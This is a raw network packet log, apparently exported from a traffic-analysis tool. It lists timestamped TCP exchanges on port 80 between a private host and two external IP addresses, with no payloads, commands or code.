Apr 4, 2024 17:49:07.224100113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224118948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224139929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224163055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224180937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224384069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224401951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224421978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224431992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224436045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224452972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224457979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224468946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224481106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224493980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224509001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224525928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224539995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224545956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224564075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224564075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224581957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224595070 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224606991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224626064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224656105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224668026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224684000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224701881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224715948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224731922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224760056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224773884 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224817038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224849939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224884987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224904060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224921942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224936962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.224975109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.224992990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225007057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225012064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225032091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225033045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225048065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225052118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225064993 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225070000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225084066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225105047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225123882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225142956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225161076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225161076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225179911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225197077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225198030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225218058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225236893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225253105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225258112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225342035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225358963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225377083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225378036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225399017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225405931 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225452900 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.225469112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225487947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225517035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225524902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225538015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225563049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225564957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225567102 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.225600958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225603104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225632906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225636959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225657940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225670099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225676060 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.225689888 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225707054 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.225749016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225765944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225779057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225785017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225795984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225805044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225819111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225824118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225836992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225842953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225855112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225877047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225897074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.225929022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.225965977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226008892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226018906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226054907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226057053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226073980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226089001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226104975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226146936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226161957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226181030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226197004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226200104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226218939 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226223946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226248026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226258039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226259947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226275921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226294994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226310968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226330042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226336002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226349115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226361036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226367950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226382971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226387024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226404905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226417065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226424932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226443052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226455927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226476908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226480007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226500034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226511955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226528883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226576090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226607084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226610899 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226640940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226644993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226676941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226682901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226716995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226716995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226736069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226749897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226757050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226767063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226775885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226794004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226794958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226807117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226825953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226851940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226871014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226885080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226905107 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226943016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226963043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.226978064 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.226995945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227001905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227114916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227149963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227152109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227169037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227188110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227201939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227206945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227219105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227242947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227260113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227277994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227292061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227297068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227308035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227315903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227332115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227349043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227370977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227389097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227402925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227406979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227420092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227427006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227440119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227458000 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227466106 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227499008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227499008 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227531910 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227535009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227571011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227605104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227623940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227638960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227643013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227657080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227673054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227699041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227714062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227732897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227746964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227752924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227771044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227790117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227797985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227809906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227823019 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227840900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227849007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227866888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227883101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227896929 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227921009 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227938890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227956057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227957964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.227972984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.227988958 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228019953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228039026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228051901 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228056908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228070021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228076935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228090048 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228106022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228131056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228151083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228166103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228168964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228178978 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228188038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228205919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228208065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228226900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228241920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228254080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228271008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228288889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228290081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228305101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228347063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228363037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228365898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228379965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228416920 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228425980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228436947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228456020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228471994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228494883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228494883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228513002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228532076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228548050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228549957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228571892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228575945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228595018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228595972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228614092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228614092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228629112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228634119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228643894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228653908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228661060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228682995 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228704929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228723049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228740931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228758097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228782892 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228796005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228813887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228848934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228858948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228877068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228895903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228910923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228928089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.228933096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.228969097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229005098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229026079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229047060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229062080 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229065895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229084969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229085922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229103088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229104042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229118109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229123116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229136944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229142904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229152918 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229166031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229172945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229187012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229199886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229218006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229243040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229259014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229274988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229279041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229293108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229307890 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229331970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229343891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229382992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229393005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229404926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229423046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229445934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229466915 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229484081 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229504108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229506969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229537964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229547024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229562998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229578972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229582071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229598045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229612112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.229615927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.229650974 CEST	80	49730	103.23.232.80	192.168.2.10
